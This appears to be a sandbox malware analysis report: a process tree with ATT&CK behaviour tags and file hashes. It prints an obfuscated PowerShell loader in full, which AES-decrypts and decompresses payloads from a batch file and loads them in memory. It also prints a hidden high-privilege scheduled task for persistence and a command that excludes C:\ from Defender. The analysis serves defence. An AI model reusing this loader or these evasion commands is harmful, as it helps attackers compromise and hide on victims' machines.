'$uCejKbTWeIFbyVTiZdbtBwGIsjlgxBCnYTeTLOZKYIQgiYAMiKSqeHGXVwRBQNyDfsdEQZxldrvSFzztJyYNImjrngYoXyUkjnbQVVVinGmNlNrvWxSrOLUSjMrKbioFwkIsyJyNDPAbawfAOCszGD=$REVPOaYHbSStfbh.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$uCejKbTWeIFbyVTiZdbtBwGIsjlgxBCnYTeTLOZKYIQgiYAMiKSqeHGXVwRBQNyDfsdEQZxldrvSFzztJyYNImjrngYoXyUkjnbQVVVinGmNlNrvWxSrOLUSjMrKbioFwkIsyJyNDPAbawfAOCszGD.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$Pg = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $Pg;$SmnMXCBRTb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Pg).Split([Environment]::NewLine);foreach ($xE in $SmnMXCBRTb) { if ($xE.StartsWith(':: ')) { $m=$xE.Substring(3); break; }}$payloads_var=[string[]]$m.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr302_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_302.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_302.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_302.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+4QKE1J0K9CBQq122My7d9xjYIEzvU8nKu3pXsE/60I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VwAnjqEmBh3DPh2idDTQQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hShqt=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$Wtaby=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$wQXJL=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($hShqt, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $wQXJL.CopyTo($Wtaby); $wQXJL.Dispose(); $hShqt.Dispose(); $Wtaby.Dispose(); $Wtaby.ToArray();}function execute_function($param_var,$param2_var){ IEX '$REVPOaYHbSStfbh=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$uCejKbTWeIFbyVTiZdbtBwGIsjlgxBCnYTeTLOZKYIQgiYAMiKSqeHGXVwRBQNyDfsdEQZxldrvSFzztJyYNImjrngYoXyUkjnbQVVVinGmNlNrvWxSrOLUSjMrKbioFwkIsyJyNDPAbawfAOCszGD=$REVPOaYHbSStfbh.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$uCejKbTWeIFbyVTiZdbtBwGIsjlgxBCnYTeTLOZKYIQgiYAMiKSqeHGXVwRBQNyDfsdEQZxldrvSFzztJyYNImjrngYoXyUkjnbQVVVinGmNlNrvWxSrOLUSjMrKbioFwkIsyJyNDPAbawfAOCszGD.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$Pg = 'C:\Users\Admin\AppData\Roaming\inicia_str_302.bat';$host.UI.RawUI.WindowTitle = $Pg;$SmnMXCBRTb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Pg).Split([Environment]::NewLine);foreach ($xE in $SmnMXCBRTb) { if ($xE.StartsWith(':: ')) { $m=$xE.Substring(3); break; }}$payloads_var=[string[]]$m.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3408
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4912
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
2KB
MD5f8634c179c1a738e20815ec466527e78
SHA15ff99194f001b39289485a6c6fa0ba8b5f50aa42
SHA256b97b56e7ceecc7fe39522d3989d98bd233353d0269a7f6517e4a8286b4ed1dc4
SHA512806b40ab4b2cd38140210d1bff3317d51af96008526298aee07e67fa858d5e9646ba594d87a5f22ec5026ee25b93f62d600eb6da92216dfb524b28260fa7388f
-
Filesize
17KB
MD59467ba7d4761f6469face2e32d48b4bf
SHA186abed67dee9d3a8e78e19562d6deaa63c3ba9d6
SHA256000cae9e1629618fe289255d5ad4100dd9d1252beca0bd5a8ba05b7f8133e3d1
SHA512fd7ce335d4cdf906fc26703219d7ead6b06abcd217ed0b35f03a83912c5f63eb01ea7a79e41103147d303ecbaa7eeed5f330a6d3d7f172ab210f3e8a888500b9
-
Filesize
1KB
MD5be8eaf8f3271863b1581f4a89e1e3bce
SHA1cdc9272e0d1a71e5bd92a9a8b080f1d3f5ddb1d4
SHA256e2b2777d3889170e0d2cb9ce4bb47b1081d454444f61871e81f0e293d49c5bf8
SHA5128a9dda90cf8cfd3e4253a1f52ad5c2d86826a0b295ebaa4d2c1430481fe0646bb68576a6d0056b036bd33151bb8188eba9c57da0d4153471c8a293202f80222c
-
Filesize
1KB
MD5b0937860a7b8531623fb23db8924d2ac
SHA1783f28c085308b6d9bf45035073ff685990c484b
SHA2569c9a4cab66f50ca6da63185b1efcf0b39a8a02b6f9e332ac69cf28e3b53e4433
SHA512ed097bd24e8afab6a0ebb41c3c81918d1a03a1a828396b7b176b2d6c2d128cd77b1d742adc6eaed7852f72f455f1840554587d6e36c98b52757ed5a0e17057e2
-
Filesize
4KB
MD5795827b4be2ff6dc00f4c83b554278df
SHA1c984aa3a5e294209f385e5c0425390df083cf5fb
SHA25602379acbd0a73e0d4176291dcf448313d617ac1434c012afc58b1ef97b0bda9d
SHA512ed31c4f0816fdbb3b834ba72a92d55927442f06a60f82cd90fb2810af3e70e14b4d4a5b20ab4cc8aa303b924ddfebb5d9a41e97e3355bbee2cb0bd0f8e00a764
-
Filesize
1KB
MD5b4ad82b1a02ae320aa9c6d71c07d03f2
SHA1dd896f5d476cce3155bd5bab5919fa99450ffbf8
SHA2563a5a2c00242dd18cd62c10ed2420a2d2c36096e5e56a92d094e6b992100d35ec
SHA51222383f7a89f057ca553369c7900543b2af288456a1d5000284610f3356e9079040464feb49c84974aeb3fb71fa7d4ceb390b84e6bff6f1535a44e2f3a763d364
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
74KB
MD5c6874553caab84425b8a564c37d2cb32
SHA1460203257f919c6646b814806736f432f8a6f5cf
SHA2569d93722292abe2640ba4fb41af3aa5c4e0408eaf5c0e6f258db6e51550a5bc2f
SHA512ad8917852bc41b6faae0324c5163b02e83a8be46da8a474b26acb19d6c5a8a05b95167e69a3adb16af6215f1f9a689a119218ed6a784de201ea7049105066c2b
-
Filesize
114B
MD508a8b5e3a0fd1f05707d08dd0f13ed05
SHA10d19c916efe2bfb9349ccee88d99a67487aeec80
SHA256ff2405aa6a6a0e6532d7f6748c629aa9936ba4f6c5fa8a0b45bd36fe5b861f22
SHA512551c1ebd6ae279824d8bda48d37ee23d68d621f9188d5159e0317ddc04eabe4175f7e5ffdd9218a06c24c103343f67971a6250f1e9a585a60bec825cf94f76a5
-
Filesize
663B
MD527581dbbe3c3840ce72f99c21071898a
SHA1898afeb9523df9367c74a01c0dbecf6b637f3cb1
SHA256c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b
SHA5120b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f
-
Filesize
2KB
MD5b8106096972fb511e0cf8b99386ecf93
SHA13003ba3a3681ba16d124d5b2305e6cc59af79b44
SHA25649d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02
SHA512218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e
-
Filesize
369B
MD5d9542019dd9ed1a174e8aaac163461de
SHA1d5300dda475df54c683d115a18267c2f0a69ae6d
SHA25663da287ba8859cee77f3389fca6cd8b3f0cb5e2e0e726e42f0067e0431a170c7
SHA51203ecd1422a20027a360208e635fc16ad6ea8ad6714c3d831f9ca381aa81abca86f070f6edccdbf4b8fe8ea350e5309aaa2b7a28919aa208e3222f441a52fd1c5
-
Filesize
652B
MD57e6452be13606287f10209ca02cb3777
SHA108875bd4031e43d031c40313c390763357c78b04
SHA25660f824c841778a97230ad2c22eea2990423b0ffff3b5e37728b8d8d4b1416deb
SHA5120be3225e30d3a271f4ebde7155b87678e4edd217f89295ec872ac337f1be0e06f7783b80d54f6a38dc0ad278f8d01ef58766fb3179c99f400f205facb8c4fd65